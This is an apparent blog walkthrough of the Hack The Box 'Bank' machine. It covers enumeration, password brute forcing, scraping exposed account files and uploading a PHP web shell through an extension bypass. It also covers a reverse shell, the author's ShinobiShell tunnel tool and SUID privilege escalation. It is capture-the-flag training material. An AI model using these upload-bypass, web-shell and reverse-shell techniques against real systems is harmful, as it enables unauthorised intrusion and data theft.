Not a ton to talk about for this box. It’s an interesting CTF style machine but I’m not sure I’d rank it in the OSCP prep category. Just something fun for a low key Sunday Morning 🙂
Defining The Attack Surface
We have 3 open ports and services running.
- 22 – SSH
- 53 – DNS
- 80 – Web Server (http)
Obligatory Nikto scan doesn’t reveal much
Let’s look at the browser
Something to note is that our earlier dig scan did identify the domain
bank.htb so I’m going to add that to my
/etc/hosts file and try the browser again
Something interesting to note
I always look at the source of at least the landing page on these things. Sometimes it pans out, sometimes not. This time, it looks like we may have found something useful. Sticking it in the back pocket for now
~~MORE ENUMERATION REQUIRED~~
I tried a series of password attacks from the dig output. I inferred that chris.bank.htb was actually an email
Chris@Bank.htb so I tried brute forcing it with hydara and rockyou.txt to no avail
More enumeration is needed
wfuzz scan got us everything we needed
balance-transfer You’ll want to check each of these out.
/balance-transfer is where the juicy stuff is
It looks like each of these files contains some type of encrypted user information
Let’s automate pulling this all down for further inspection
First I fetch the html of the page with curl
curl http://bank.htb/balance-transfers > transfers_raw
then I take that HTML over to http://regex101.com – If you don’t regex, you’re about to see how magical it is
I pasted all of the HTML into regex101 and then I wrote a really simple regex to grab all of the urls
What this regex says is
(?>=acc\">) Start after
.* grab everything
(?=>\a>) Stop at
As you can see from the above screen shot, it successfully grabs all of the filenames.
Next I export it
I stuck that in a file called
account_links and now we’re ready to pull them all down
for link in $(cat account_links); do wget http://bank.htb/balance-transfer/$link ; done
that command pulled every file down.
Then to make sure I got it all, I cat’d each out with
for file in $(ls); do cat $file ; done
Let’s see what we’ve got.
First I try and just pull the password hashes out
Same command as cating them out but with a grep in there
for file in $(ls); do cat $file | grep "Password”
Now let’s isolate the hash with cut
for file in $(ls); do cat $file | grep "Password" | cut -d " " -f2
And there’s all of our hashes!
As I was scrolling through them looking for anything that stood out, I came across this nugget
Looks like a plaintext password in there
The file size will probably be different so let’s see if we can find the file with ls
One more time with that bash for loop magic | quick and dirty is my middle name today
for file in $(ls); do echo $file ; cat $file | grep HTBB4nk ; done
Using our new found creds thanks to chris, we now have access to his account.
Not a ton to see here.
Flipping over to the support page we find a ticket system that allows for file uploads.
The first thing I try is uploading just a plain text file
Then I recalled that we found that little debug comment on the landing page about files with the extension htb
Sure enough, I tried renaming the same file with the htb extension and it uploaded.
The comment also said that the htb extension would execute as php. Seems pretty obvious this’d be our attack vector for a shell.
First I test it with a simple php script
Okay, now for the shell
No need to reinvent the wheel. Kali has a ton of webshells pre-baked
Don’t forget to change the IP and Port
Looks like the upload worked!
Let’s start our listener and open the shell
To easy – On to root
Something I have a habit of doing lately is dog fooding my favorite linux red team shell, shinobi shell
Once it’s downloaded to my attacking machine, I start up a shinobi server
./ShinobiShell.py -l 444
Next I pull it down to my victim machine
Starting the Shinobi Client is easy. We just give it the
-c flag for connect and it will prompt you for your attacking server IP. There’s other flags as well. ShinobiShell allows you to setup an encrypted tunnel if you wish.
Because you’re prompted after run for the ip, port and encryption key, none of this will live in your logs and it makes it harder to discover
First stop is getting our user.txt flag if we can. Which it appears on this machine we can.
Now we move on to privilege escalation
This is where ShinobiShell really shines. It allows you to pull and push information/files/exploits to and from and through your attacking machine as you need with single commands.
Something I like to start with is
You can easily get it on your victim machine just by typing
ShinobiShell will go request over the tunnel to the ShinobiServer for suid3num and the ShinobiServer will go get the latest version and send it back over the tunnel to you
Once we run
suid3num we see there’s a binary called
/usr/htb/bin/ that has suid privileges
I decided to yolo and just run it to see what happened … Maybe we’ll get some help text on what it does
JK WE ROOT lol
And that’s the box